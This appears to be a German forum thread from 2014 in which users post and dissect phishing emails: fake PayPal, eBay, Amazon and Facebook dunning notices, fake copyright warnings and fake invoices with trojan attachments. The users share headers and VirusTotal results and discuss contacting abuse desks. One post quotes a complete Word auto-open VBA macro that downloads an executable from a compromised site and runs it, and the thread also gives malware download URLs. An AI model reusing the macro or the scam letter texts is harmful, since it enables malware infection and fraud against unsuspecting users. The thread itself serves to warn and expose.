Für weitere Fragen schreiben sie uns eine E-Mail oder besuchen Sie unsere Website. Dort erhalten Sie weitere nützliche Tipps und Tricks zum sicheren surfen im Internet.

Zum Sicherheitsscanner
http://online-datenserver.de/datenabgleich-sicherheitsserver.de/Sicherheitsscanner.exe



Interessant ist der falsche Name im "To"-Feld, der mit meiner Email-Adresse verknüpft wurde.
Dieser falsche Name tauchte schon vor einigen Monaten in Spam-Mails auf.
Die Absender nannten sich beispielsweise

"Anwaltschaft" (Anhang mit ZIP-Datei)
Forderung der stornierten Buchung Ihrer Bestellung *** *** vom **.**.2014.zip

"Beauftragte Anwaltskanalei" (Anhang mit ZIP-Datei)
Forderung der abgewiesenen Zahlung *** ***.zip

oder auch
"Anwaltskanalei"
"Anwaltschaft"

"Arbeitsangebote" gab es aus der Ecke auch:
"Stellenausschreiben Arbeitsagentur" (Subject: Online Arbeitsagentur Stellenausschreiben für *** ***)
"Jobforum" (Subject: Nebenbeschaftigung fur Sie)

Mittwoch
28.06.2014, 08:10
Bei manchen Antiviren-Programmen wird der Scanner selbst als solcher erkannt, da das Programm einen tiefen Systemscann macht. Damit der Scanner wirklich 100% funktioniert, können sie Ihr Antivirenprogramm für die Zeit des Scanns ausschalten.
Nein, in dem Falle arbeiten die Virenscanner genau so, wie sie sollen, denn der "Sicherheitsscanner" ist ein Schädling. Schön zu sehen, dass die Kriminellen offenbar zu dämlich waren, den Link ordentlich zu machen, denn er führt ins Leere:


The requested URL /Sicherheitsscanner.exe was not found on this server.

Schönen Gruß
Mittwoch

carkiller08
28.06.2014, 09:13
Der Link funktionierte schon und Virustotal kannte den Link auch schon.
Ergebnis von Virustotal (https://www.virustotal.com/de/url/bd4856d37d079e7e818dc8f8fafce43f420dfe6ddba11ca87adb13f73d6d34dd/analysis/)
Der Schädling wurde aber offenbar inzwischen entfernt.

schara56
28.06.2014, 11:00
Wenn man die abgehende IP 85.10.243.215 aufruft landet man bei https://www.perfect-privacy.com/german/

Speedy56
30.06.2014, 21:17
Oh je - diesmal konnte meine nicht getätigte Bestellung von Paypal nicht abgebucht werden:

Sehr geehrte/r xxxx yyyyyyyy,

das angegebene Konto wurde nicht genügend gedeckt um die Lastschrift durchzuführen. Sie haben eine nicht beglichene Forderung bei der Firma Paypal GmbH vorliegen. Namens unseren Mandanten Paypal GmbH fordern wir Sie auf, die offene Gesamtforderung schnellstens zu begleichen.

Aufgrund des bestehenden Zahlungsverzug sind Sie gemäß § 286 BGB verpflichtet zuzüglich, die durch unsere Beauftragung entstandenen Kosten von 34,28 Euro zu tragen.

Wir erwarten die Überweisung bis spätestens 02.07.2014 auf unser Bankkonto. Für Rückfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums.
Falls Sie diesen Zahlungstermin nicht einhalten, werden wir Ihnen weitere Kosten des Mahnverfahrens und Verzugszinsen in Rechnung stellen müssen.

Die Rufnummer und weitere Informationen finden Sie in Ihrer Rechnung im Anhang. Es erfolgt keine weitere Mahnung. Nach Ablauf der Frist wird die Angelegenheit dem Gericht und der Schufa übergeben.

Eine volle Forderungsausstellung, der Sie alle Einzelpositionen entnehmen können, fügen wir bei.

Mit verbindlichen Grüßen

Paypal GmbH

Moritz Hagenberg


From - Mon Jun 30 xx:xx:xx 2014
X-Account-Key: account7
X-UIDL: [UID filtered]
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: benjamin.baker [at] uon.edu.au
Received: from na01-bn1-obe.outbound.protection.outlook.com ([157.56.110.248])
by mx-ha.gmx.net (mxgmx106) with ESMTPS (Nemesis) ID: [ID filtered]
for <poor [at] spamvictim.tld>; Mon, 30 Jun 2014 xx:xx:xx +0200
Received: from termwal (62.246.124.61) by
BY2PR02MB329.namprd02.prod.outlook.com (10.141.140.142) with Microsoft SMTP
Server (TLS) ID: [ID filtered]
From: Inkasso Paypal GmbH <c3167387 [at] uon.edu.au>
To: xxxxxx xxxxxxxxxxx<poor [at] spamvictim.tld>
Subject: =?utf-8?q?Die Kontoabbuchung konnte von Ihrem Bankkonto nicht durchgef=C3=BChrt werden?=
Date: Mon, 30 Jun 2014 xx:xx:xx +0000
Message-ID: [ID filtered]
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00B8_9C75B32A.9331552C"
Return-Path: c3167387 [at] uon.edu.au
X-Originating-IP: [62.246.124.61]
X-ClientProxiedBy: BLUPR02CA038.namprd02.prod.outlook.com (25.160.23.156) To
BY2PR02MB329.namprd02.prod.outlook.com (10.141.140.142)
X-Microsoft-Antispam: BCL:0;PCL:0;RULEID:
X-Forefront-PRVS: 0258E7CCD4
X-Forefront-Antispam-Report:
SFV:SPM;SFS:(6009001)(199002)(189002)(84326002)(224313004)(79102001)(4396001)(77 982001)(105586002)(8558605003)(46102001)(64706001)(20776003)(95666004)(224303003 )(549064007)(66066001)(33716001)(106356001)(80022001)(21056001)(229853001)(81342 001)(85306003)(92566001)(512874002)(54356999)(77096002)(71186001)(33646001)(7466 2001)(31966008)(85852003)(568964001)(87976001)(107046002)(92726001)(81542001)(42 186005)(99396002)(76482001)(73692001)(50986999)(88552001)(101416001)(102836001)( 83322001)(83072002)(19580395003)(74482001)(107886001)(74502001)(71636004)(463020 01);DIR:OUT;SFP:1501;SCL:9;SRVR:BY2PR02MB329;H:termwal;FPR:;MLV:ovr;PTR:InfoNoRe cords;A:1;MX:1;LANG:;
X-OriginatorOrg: uon.edu.au
Envelope-To: <poor [at] spamvictim.tld>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)
X-UI-Filterresults: notjunk:1;V01:K0:+sghD7Jljy8=:1ymYrUY335mhuyPLP81LwvmuVE
9q9bnSEaa43Em/c5Q9BwwYMJmND26DRbV/awhcRV7bS3gi/CHwjNN9VYl1hA1w1W9sKvxdCQf
/ms9ZBYQh3Xbia20unsfRYzFxgLIeNEVU6zW3GPikuvt/C6sOxHHRqKccWWfxnM3DvEP0ZeHW
aBlR7tCQ0eteIb4Q797OpYAmXVQ1G9I7C5z7u/IGwxI0D5X02rdYcGkyg2mc7fNRvbefj1dWp
p+MZvQ7QJzSvh059kORnYEs1acGSQfEwnVxmi7+yy2pPoTRqM43gL9Imm6oTQBw73fpx1wgd4
r/Ctj3DOuqMm2DUYNngxvtTRnvH2XCCYSS9OAqnFZFl+gC+wUfVonjvib4DrCkhrHRx7p+trD
WoL1h4JedTy3vsMqeJFwyABqs8KrhKIv7nF84GCiD7swbCS7Kyzk3rKZBgscsTuNFrDw/zQZB
iBRNauD5Ot+5KGbIFgHyOsaGzzMBENRwUKDcYfCfvlEWhiFF4FWC8uLFNsKT0W+JIYe7OEZNa
bVaZRpb9PH1GHqpZc/JG1ovn/wsd2LmbufqyyE+UDcGVECyqbdeGxcBSu9MKL2YmHbn8LZM0s
ixcrjP6pGaOjfo3GIwPbPrjsUyqhwyPwHDeAuLlra6pcrN+R0+vidQgFg9RgeRUAYJiKxqwsO
xfp+vjECbg6nVQPYkvnCZDUu8H+vmmWGAckVJr5u9sYg3aiBONJ3Eyw4bcbVwcymszSZJKw23
4tFVLMvh2kkV2outmhZ33Xin+J40FPHEzb4SxloHlFRH05nKvpdIvqDoA6aWjv25kMSK++lWs
JT8J1q/5qahhnvKVXalCtzAeD5fFIa6MejS1FKMYUU8d6l3MxK1+U29KbCoX30MujgBLi/yPL
FrJODvnWeSqNpmyPzBhTZ00NveFkFD1iesHvjWXHhF94rFZpmHrUjJWzJode2zAY2nA8tOZaj
wPcPZv1NjfADypei1ciXkCFOq7L9tuh/awfuj4EkfXxQqp/HfifxRhsAz9JwqENx/F09fA4xI
bGj7MP6h2Kjhwp7XZmtBirxxhTmkRK2aZ2dOVVMMfA204uMGyLlYZT2bF0lqt8br2M3FC0Q8n
2THCnFqvwZZ+UT6d5gWIf02aQI8e2fqjJ7ceXLSy3b9ZWnzghvhxifDpTO3/4IhLR6VXxSsn6
A1eBhQD7JREGsbue8dz620H93YnL0rWTOUYZbVRN26MA==

------=_NextPart_000_00B8_9C75B32A.9331552C
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: quoted-printable


Dem ganzen war noch ein doppelt gezippter Anhang beigefügt den mein Virenscanner nicht erkannt hat.
Virustotal hat jedoch einige böse Buben enttarnt....

isenaecher
19.07.2014, 19:23
Uhhh habe ich jetzt Angst. :scared: Vorgestern hier eingeschlagen. Weder mein Spamfilter noch mein Virenscanner haben angeschlagen


Sehr geehrte/r Vorname Iseneacher,

am 13.06.2014 gegen xx:xx:xx Uhr ist von Ihrer IP Adresse Nr. 68.22.243.23 eine Verletzung der Urheberrechte an dem Projekt unseres Kunden begangen. Sie haben den Kinofilm: Der Club der roten Fister von der Tauschbörse Pornotube, verteilt.

Aufgrund des § 53 des UrhG sind wir in der Lage, jedes Anlegen einer unerlaubten Kopie durch eine Anzeige zu bestrafen. In Beilage finden Sie den Anzeigentext und den Beschwerdenachweis.

Der neu eingefügte § 53a regelt den Fernversand von Artikeln durch Dienste wie Subito. Im Unterschied zu den Forderungen der Verlage hat der Gesetzgeber den Fernversand von Artikeln nicht grundsätzlich verboten, aber erheblich eingeschränkt. So dürfen Bibliotheken nur noch dann Zeitschriftenartikel verschicken, wenn die Verlage kein entsprechendes Online-Angebot vorhalten, und das auch nur als grafische Datei, also ohne die Möglichkeit, die Texte zu durchsuchen.


Mit freundlichen Grüßen

RA Ralf Sieburg

he
An diesem Tag um diese Zeit war ich nicht am Rechner. Da habe ich sehr, sehr viele Zeugen :freude::freude:

Received: from mout.kundenserver.de (212.227.126.130) by mx-ha.gmx.net
(mxgmx110) with ESMTPS (Nemesis) ID: [ID filtered]
<ich armes spamopfer [at] gmx.de>; Thu, 17 Jul 2014 xx:xx:xx +0200
Received: from euGenia-PC (aftr-37-201-226-75.unity-media.net 37.201.226.75)
by mrelayeu.kundenserver.de (node=mreue001) with ESMTP (Nemesis)
ID: [ID filtered]
From: "RA Ralf Sieburg" <freedom16 [at] online.de>
To: "Vorname Iseneacher" <ich armes poor [at] spamvictim.tld>
Subject: Anzeige gegen Vorname Iseneacher,17.07.2014
Date: Thu, 17 Jul 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0

Eingeschlagen über GMX. Wo haben die nur meinen kompletten Namen abgegriffen ?

Anhang wurde natürlich nicht aufgemacht:depp:

truelife
21.07.2014, 07:22
xx:xx:xx Uhr

Im Ernst? :lil:

madman70
21.07.2014, 20:47
Sehr geehrter Kunde, Ihre überfällige Rechnungen 132916 beigefügt werden.

Leisten Sie bitte die Bezahlung in kurzer Frist.

Wir danken Ihnen für Ihr Business und ermöglichen ihnen unser ausgezeichnetes Service zu benutzen.

Mit freundlichen Grüßen


Watt? Ich glaub, da muss ich erst ein paar Bierchen zischen, um den Text zu verstehen :D

Drangetackert ein Word-Dokument ohne Text, dafür mit einem Auto-Open-Makro, welches bei mir "leider" nicht funktioniert...



Sub Auto_Open()
v45
End Sub

Sub AutoOpen()
Auto_Open
End Sub

Sub Workbook_Open()
Auto_Open
End Sub

Sub v45()
Dim dvIZ51 As String
Dim wFEf2cbw As Integer
suka = "http://wellingten.de/images/werf.exe"
Dim X2: Set X2 = CreateObject("Adodb.Stream")
Dim r08Ll: Set r08Ll = CreateObject("Msxml2.XMLHTTP")
dvIZ51 = Environ("USERSPROFILE")
r08Ll.Open "GET", suka, False
r08Ll.Send
With X2
.Type = 1
.Open
.write r08Ll.responseBody
.SaveToFile dvIZ51 & "\dg34g.scr", 2
End With
retval = Shell(dvIZ351 + "\dg34g.scr", vbNormalFocus)
End Sub


Die ganz sicher nützliche, ausführbare (für Windows) Datei käme dann von http://wellingten.de/images/werf.exe...

Wobei www.wellingten.de nach einem netten Restaurant aussieht und da wohl als Trojanerschleuder missbraucht wird...

Hier noch ein Absender


Received: from nm24-vm5.bullet.mail.ir2.yahoo.com ([212.82.97.29]) by
mx-ha.web.de (mxweb104) with ESMTPS (Nemesis) ID: [ID filtered]
<xxxxx [at] web.de>; Mon, 21 Jul 2014 xx:xx:xx +0200
Received: from [212.82.98.53] by nm24.bullet.mail.ir2.yahoo.com with NNFMP; 21 Jul 2014 xx:xx:xx -0000
Received: from [46.228.39.64] by tm6.bullet.mail.ir2.yahoo.com with NNFMP; 21 Jul 2014 xx:xx:xx -0000
Received: from [127.0.0.1] by smtp101.mail.ir2.yahoo.com with NNFMP; 21 Jul 2014 xx:xx:xx -0000

isenaecher
21.07.2014, 22:07
xx:xx:xx Uhr Im Ernst? :lil:

Hatte ich gar nicht auf dem Schirm. Zu dumm zum Spammen :facepalm: Der Provider sollte sich mal nach neuer Kundschaft umsehen.

Abuse hat wohl keinen Sinn, oder ?

Den RA gibts wirklich. Der arme Kerl hat es mittlereweile auf Google Rang eins geschafft.
Hat aber offensichtlich nichts damit zu tun

Mittwoch
22.07.2014, 08:02
Wobei www.wellingten.de nach einem netten Restaurant aussieht und da wohl als Trojanerschleuder missbraucht wird...
Ich würde die Mail mindestens an den Abuse-Kontakt des Hosters weiterleiten. Vielleicht rufst Du in dem Restaurant ja auch mal an und kündigst rechtliche Schritte wegen Computersabotage nach §303b StGB an? Ein Hinweis an örtliche Medien wirkt auch manchmal Wunder…

Schönen Gruß
Mittwoch

madman70
22.07.2014, 18:33
Ich habe mal eine Mail an kcshostmaster [at] kcs.info geschickt - die Adresse steht bei der Domainregistrierung...

Ist eine Internetagentur - vielleicht sind die auch für die Webseite selber zuständig - zumindest können die mal in den Webspace schauen nach der ominösen *.exe...

Mal sehen, ob eine Antwort kommt :)

Ich tippe mal, das Restaurant selber kann nix dafür - die haben das sicher outgesourct an die Internetagentur (Neuland und so) und kümmern sich höchstens mal um Inhalte wie Speisekarte o.ä. ...

Falls da nix kommt, kann ich ja auch nochmal den eigentlichen Hoster zutexten, also den Inhaber der IP der Domain 212.162.12.207...

schara56
22.07.2014, 23:16
...] Ist eine Internetagentur - vielleicht sind die auch für die Webseite selber zuständig - zumindest können die mal in den Webspace schauen nach der ominösen *.exe [...Die *.exe scheint weg zu sein.

madman70
23.07.2014, 11:06
Ja - die Internetagentur hats selber schon gemerkt :)



Sehr geehrter Herr xxxxx,

vielen Dank für Ihre Nachricht, wir haben die Datei bereits
gestern Vormittag entfernt und unseren Kunden informiert.

Mit freundlichen Grüßen

xxxxx

KCS Internetlösungen Kröger GmbH
...

kjz1
23.07.2014, 11:47
Wobei ich mir immer denke: hoffentlich wurde nicht nur die Datei entfernt, sondern der Server auch 'abgedichtet'.

madman70
13.08.2014, 14:06
Und wieder eine angebliche Mahnung von eBay - die hätten ja ruhig mal meinen eBay-Account-Namen mit reinschreiben können - dann wäre das ganze vielleicht etwas glaubwürdiger gewesen... hmmm... eher auch nicht :D



Sehr geehrte/r [mein Name],

Sie haben eine offene Forderung bei unseren Mandanten Ebay GmbH. Das von Ihnen gespeicherte Bankkonto wurde im Moment der Abbuchung nicht genügend gedeckt um die Lastschrift durchzuführen. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Gesamtforderung unverzüglich zu begleichen.

Die Überweisung erwarten wir bis spätestens 18.08.2014. Für Rückfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums. Aufgrund des bestehenden Zahlungsverzug sind Sie verpflichtet zuzüglich, die durch unsere Beauftragung entstandenen Kosten von 37,17 Euro zu tragen.

Die Rufnummer und weitere Informationen ersehen Sie in Ihrer Rechnung anbei im Anhang. Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der Frist wird die Angelegenheit dem Gericht und der Schufa übergeben. Eine volle Forderungsausstellung, der Sie alle Einzelpositionen entnehmen können, fügen wir bei.

Mit freundlichen Grüßen

Ebay GmbH

Beauftragter Rechtsanwalt Lasse Zebitz


Rechnung von gestern und heute schon eine gebührenpflichtige Abmahnung - uiuiui - das nenn ich mal fix...

Schade auch, dass die Kontaktdaten wohl nicht mehr direkt in die Mail gepasst haben - die war wohl schon voll...

Drangetackert ein ominöses ZIP-File - da drin noch ein ZIP und ganz innen eine *.com-Datei ... jaaaa genau ...

Hier wär noch ein Header dazu:


Return-Path: yyyyy [at] web.de
Received: from mout.web.de ([212.227.17.11]) by mx-ha.web.de (mxweb102) with
ESMTPS (Nemesis) ID: [ID filtered]
Aug 2014 xx:xx:xx +0200
Received: from Remo-PC ([37.117.242.155]) by smtp.web.de (mrweb102) with
ESMTPSA (Nemesis) ID: [ID filtered]
Aug 2014 xx:xx:xx +0200
From: "Beauftragter Rechtsanwalt" <yyyyy [at] web.de>
To: "ich" <poor [at] spamvictim.tld>
Subject: ich - Rechnung 35493573 vom 13.08.2014
Date: Wed, 13 Aug 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0009_2B94E7DA.21DB9145"
X-Provags-ID: [ID filtered]
3GxSMbZqIEqNM2AWwZipAK6B7kdp8JjPA4ArJjoRO80Kos8CwxfOcVx/AzBCzNmSm3xIo0U
RtgyxC0HY6PYTU/94SqIcZLD+M9x5/OmpWrMEi0jDc9KGkxyiKRDYUXocF5DcHJs2cyyAwI
+GGSLdXkkHhF8G6qDWYcA==
X-UI-Out-Filterresults: notjunk:1;
Envelope-To: <poor [at] spamvictim.tld>


Den gefakten Absender habe ich mal geändert - der klang auch nicht wirklich nach einer Adresse, die ein "seriöser" Anwalt benutzen würde *gggg*...

Eniac
16.08.2014, 17:57
Return-Path: romoflo [at] online.de
Received: from mout.kundenserver.de ([212.227.126.130]) by mx-ha.gmx.net
(mxgmx110) with ESMTPS (Nemesis) ID: [ID filtered]
<my.adress [at] gmx.de>; Sat, 16 Aug 2014 xx:xx:xx +0200
Received: from Gerhard-PC (dslb-088-066-156-146.088.066.pools.vodafone-ip.de [88.66.156.146])
by mrelayeu.kundenserver.de (node=mreue005) with ESMTP (Nemesis)
ID: [ID filtered]
From: "Stellvertretender Rechtsanwalt" <romoflo [at] online.de>
To: "Vorname Nachname" <poor [at] spamvictim.tld>
Subject: Vorname Nachname - Rechnung 19394389 vom 16.08.2014
Date: Sat, 16 Aug 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00D2_7CFA80AD.2C271A01"


Sehr geehrte/r $Vorname $Nachname,

Sie haben eine ungedeckte Forderung beim Unternehmen Amazon GmbH. Das von Ihnen angegebene Bankkonto wurde im Moment der Abbuchung nicht ausreichend gedeckt um die Lastschrift vorzunehmen.

Die Überweisung erwarten wir bis spätestens 20.08.2014. Für Rückfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums. Aufgrund des bestehenden Zahlungsverzug sind Sie verpflichtet zusätzlich, die durch unsere Tätigkeit entstandenen Kosten von 33,23 Euro zu tragen. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Gesamtforderung unverzüglich zu begleichen.

Die Kontakt Telefonnummer und weitere Informationen finden Sie in Ihrer Rechnung anbei. Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der Frist wird die Angelegenheit dem Gericht und der Schufa übergeben. Eine vollständige Forderungsausstellung, der Sie alle Einzelpositionen entnehmen können, fügen wir bei.

Mit verbindlichen Grüßen

Amazon GmbH

Stellvertretender Rechtsanwalt Aaron Eck

Im Anhang eine Datei "Vorname Nachname Ausgleich stornierten Zahlung Ihrer Bestellung Amazon vom 16.08.2014.zip", lt. https://www.virustotal.com/de/ natürlich ein Trojaner.


Eniac

carsten.gentsch
02.09.2014, 16:20
Sollte hier passen falls nicht bitte tackern danke!

Netter Versuch über Polen Domain -> aber da kommt das ganze her http://whois.domaintools.com/203.147.71.68
203.147.71.68 leider erkennen noch nicht alle den Inhalt. Da wurde wohl ein Emailzugang gehackt bei http://www.wp.pl/


Faxnachricht [Caller-ID: [ID filtered]
Seiten: 26. Datum: 02/09/2014 xx:xx:xx.
Kennziffer: A42BC25D753EF3156BD301E.

Return-Path: <jarcopan [at] wp.pl>
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16)
X-Spam-Flag: YES
X-Spam-Level: **************************************************
X-Spam-Status: Yes, score=100.0 required=5.0 tests=FREEMAIL_FROM,HTML_MESSAGE,
RCVD_IN_DNSWL_NONE,SPF_PASS,USER_IN_BLACKLIST autolearn=no version=3.3.1
X-Spam-Report:
* -0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at http://www.dnswl.org/, low
* trust
* [212.77.101.10 listed in list.dnswl.org]
* 100 USER_IN_BLACKLIST From: address is in the user's black-list
* 0.0 FREEMAIL_FROM Sender email is freemail (jarcopan[at]wp.pl)

Bereitsbekannt für Spam und mit netten EMail anhang als Zipdatei die ich nicht geöffnet habe! Ergebniss kann man hier ansehen: https://www.virustotal.com/de/file/2d9a56c32247c4c9db5724aa3cf5a1b81a8305483f7bd428433ebe91757540de/analysis/
Post geht an jarcopan [at] wp.pl

wayner
19.09.2014, 04:29
Also da hab ich jetzt wirklich dumm geguckt! Ist aber ein Fake, weil ich weder mit dem Inhaber von laminatshop.de noch mit dem von der-laminatshop.de (so steht es in der Überschrift) zu tun hatte und dann kommt noch die IBAN mit "PL" am Anfang hinzu, mit Polen hatte ich schon gar nichts zu tun.

Und die beiden Domaininhaber von der-laminatshop.de und von laminatshop.de haben wohl ebensowenig mit der Sache zu tun, wie dieser U. B. (dem gehört die zweite Domain).

Und *KEIN* Anhang mit Rechung / Mahnung etc.

Eingeworfen wurde das hier:

Received: from mail-in-18.arcor-online.net (<mein Provider> [Adresse])
by <mein Provider> (Postfix) with ESMTP ID: [ID filtered]
for <meine Adresse>; Wed, 4 Jun 2014 xx:xx:xx +0200 (CEST)
Received: from bt.foo.org (cable-86-56-29-53.cust.telecolumbus.net [86.56.29.53])
by <mein Provider> (Postfix) with ESMTPS ID: [ID filtered]
for <meine Adresse>; Wed, 4 Jun 2014 xx:xx:xx +0200 (CEST)
Received: from bt.foo.org (localhost [127.0.0.1])
by bt.foo.org (8.14.3/8.14.3/Debian-9.1ubuntu1) with ESMTP ID: [ID filtered]
for <meine Adresse>; Wed, 4 Jun 2014 xx:xx:xx +0200


Ich hatte bereits im Mai eine Mail mit der gleichen Kontonummer drin:



Sehr geehrter supply24-shop.de-Kunde,

bei der Überprüfung Ihres Kundenkontos haben wir festgestellt, dass der Betrag von 49,95 Euro noch nicht bei uns eingegangen ist.

Hierbei wurden Zahlungseingänge bis zum 27.05.2014 berücksichtigt. Sollten Sie den fälligen Betrag inzwischen bezahlt haben, danken wir Ihnen und bitten Sie, dieses Schreiben als gegenstandslos zu betrachten.
Andernfalls überweisen Sie bitte den Rechnungsbetrag innerhalb der nächsten 14 Tage, also bis zum 10.06.2014 auf das angegebene Konto. Sollten wir bis zu diesem Zeitpunkt keinen Zahlungseingang festellen, werden weitere rechtliche Schritte eingeleitet.

--------------------------------------
Kontoinhaber: supply24-shop
IBAN: PL51 11602202 00000002 58272668
BIC: BIGBPLPW
Betrag: 49,95EUR
--------------------------------------

Bei Zahlung geben Sie bitte immer Ihr Kundenkonto als Verwendungszweck an.

Mit freundlichen Grüßen
Ihr supply24-shop.de Team


-


I&S - INNOVATION & SUPPLY
M*** W***
Elisabethenstraße 5
D-97274 Leinach


Auch hier telecolumbus Adressen:


Received: from bt.foo.org (cable-62-117-9-37.cust.telecolumbus.net [62.117.9.37])
by myserver (Postfix) with ESMTPS ID: [ID filtered]
for <meee>; Thu, 29 May 2014 xx:xx:xx +0200 (CEST)


Heute dann eine weitere Mail



Sehr geehrter Supply24-Kunde,

trotz unserer schriftlichen Erinnerungen konnten wir bis zum heutigen Tag keinen Zahlungseingang feststellen.

Zur Zahlung offen sind folgende Beträge:

Rechnungsbetrag: 89,99 EUR
Mahnkosten: 5,00 EUR
-----------------------------------
Summe: 94,99 EUR

Rechnungsnummer: 169365136

Zahlungsempfänger:
Name: PPRO Financial Ltd
IBAN: DE79700111100250250010
BIC: DEKTDE71002
Verwendungszweck: 169365136

Wir bitten Sie daher letzmalig, den fälligen Betrag bis zum 02.10.2014 auf das Konto des entsprechenden Zahlungsempfänger, unter Angabe der Rechnungsnummer einzuzahlen.
Sollte auch dieser Termin ohne Zahlungseingang verstreichen, sehen wir uns gezwungen, ohne erneute Aufforderung gerichtliche Schritte einzuleiten. Beachten Sie bitte,
dass dadurch für Sie erhöhte Kosten entstehen würden.
Hat sich diese Mahnung mit Ihrer Zahlung überschnitten, bitten wir Sie, dieses Schreiben als gegenstandslos zu betrachten.

Mit freundlichen Grüßen
Ihr Supply24 Team

-

I & S -INNOVATION & SUPPLY
M*** W***
Elisabethenstraße 5
D-97274 Leinach


Wieder telecolumbus als Absender ...


Received: from bt.foo.org (cable-86-56-83-173.cust.telecolumbus.net [86.56.83.173])
by myserver (Postfix) with ESMTPS ID: [ID filtered]
for mee; Fri, 19 Sep 2014 xx:xx:xx +0200 (CEST)


Das erste was mir immer auffällt ist das es keine persönlichen Anreden gibt, die Kontonummern nicht mal annähernd zu passen scheinen. ( Ich finde sie sonst nur in einem wordpress blog für bibeltreue Christen ... )

truelife
19.09.2014, 11:45
Kontoinhaber: supply24-shop
IBAN: PL51 11602202 00000002 58272668
BIC: BIGBPLPW


--> Konto der BANK MILLENNIUM S.A., Warschau, Polen


Zahlungsempfänger:
Name: PPRO Financial Ltd
IBAN: DE79700111100250250010
BIC: DEKTDE71002


--> Konto der SOFORT Bank (Marke der Deutschen Kontor Privatbank AG)

Die PPRO Financial Ltd ist ein Finanzdienstleister, der bei der britischen Aufsichtsbehörde für Finanzdienstleistungen (FCA) reguliert wird. Wahrscheinlich leitet dieser das Geld weiter.

madman70
23.09.2014, 16:05
Isch abe gar keine Facebook...



Sehr geehrter Kunde <richtiger Name>,

Sie haben eine offene Rechnung beim Unternehmen Facebook AG. Ihre Bank hat die Lastschrift storniert. Unsere Forderung ist damit offen und rechtens.

Namens unseren Mandanten fordern wir Sie auf, die offene Gesamtforderung schnellstens zu begleichen. Aufgrund des bestehenden Zahlungsverzug sind Sie gezwungen dabei, die durch unsere Beauftragung entstandenen Kosten von 48,15 Euro zu tragen. Wir erwarten die vollständige Zahlung einbegriffen der Gebühren bis zum 25.09.2014 auf unser Girokonto. Für Fragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums.

Es erfolgt keine weitere Mahnung. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa übergeben. Die detaillierte Kostenaufstellung, der Sie alle Positionen entnehmen können, fügen wir bei.

Mit freundlichen Grüßen

Rechtsanwalt Hechinger Linus


Drangetackert ein geschachteltes Zip, innen drin eine "Rechnung 22.09.2014 - Rechtsanwalt Facebook AG.com" mit einem Trojaner, siehe hier https://www.virustotal.com... (https://www.virustotal.com/de/file/22844f7e4ebda6c3a2a966880bc9a00b6ef940910b54d3ed54708b78d89b26c4/analysis/1411480478/)

Rechnung angeblich von gestern und heute schon die letzte Mahnung - was für nervöse Menschen...

Die Mail kam aus dem gemütlichen Österreich über Ungarn angereist :)


Return-Path: laszlo.kutas [at] aok.pte.hu
Received: from mailgw.aok.pte.hu ([193.6.63.13]) by mx-ha.web.de (mxweb109)
with ESMTPS (Nemesis) ID: [ID filtered]
23 Sep 2014 xx:xx:xx +0200
Received: from mail.aok.pte.hu (mail.aok.pte.hu [193.6.63.4])
by mailgw.aok.pte.hu with ESMTP ID: [ID filtered]
(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
for <poor [at] spamvictim.tld>; Tue, 23 Sep 2014 xx:xx:xx +0200
Received: from localhost (localhost [127.0.0.1])
by mail.aok.pte.hu (Postfix) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Tue, 23 Sep 2014 xx:xx:xx +0200 (CEST)
X-Virus-Scanned: clamav-milter 0.98.1 at mailgw.aok.pte.hu
Received: from mail.aok.pte.hu ([127.0.0.1])
by localhost (mail.aok.pte.hu [127.0.0.1]) (amavisd-new, port 10026)
with ESMTP ID: [ID filtered]
Tue, 23 Sep 2014 xx:xx:xx +0200 (CEST)
Received: from PC004 (ge10-rb1100.vie.funkinternet.at [194.33.108.254])
(using TLSv1 with cipher AES128-SHA (128/128 bits))
(No client certificate requested)
(Authenticated sender: laszlo.kutas [at] aok.pte.hu)
by mail.aok.pte.hu (Postfix) with ESMTPSA ID: [ID filtered]
for <poor [at] spamvictim.tld>; Tue, 23 Sep 2014 xx:xx:xx +0200 (CEST)
From: "Rechtsanwalt" <laszlo.kutas [at] aok.pte.hu>

cano89
27.09.2014, 10:42
x-store-info:fHNTDlzCF8Nxw6HwcfGQy+S7Ax/lqLSmNphQ3OF+T9E=
Authentication-Results: hotmail.com; spf=pass (sender IP is 62.24.128.249) smtp.mailfrom=michelle.marks [at] talktalk.net; dkim=none header.d=talktalk.net; x-hmca=pass header.id=michelle.marks [at] talktalk.net
X-SID-PRA: michelle.marks [at] talktalk.net
X-AUTH-Result: PASS
X-SID-Result: PASS
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTkaowKVj4sIBRs5L/uLmDhOqQworHdCdoj0zgRzqRvKBiqdvxDQnw5XPkYYfcksUmd97D5IrVaIe8gQrbEdUCAqiwBvt/IrZOz1I1JPKSSQ3ZeLj1TxrEAPRw8lO0BH0aLLxFQavFiVJh1uaj0MFZDWhm6bQvn4dpAx7J43Kcbve7 aGjYmyq4jCjE4QFP/py76Aefpd7B5AgKHSHfMX5sjk
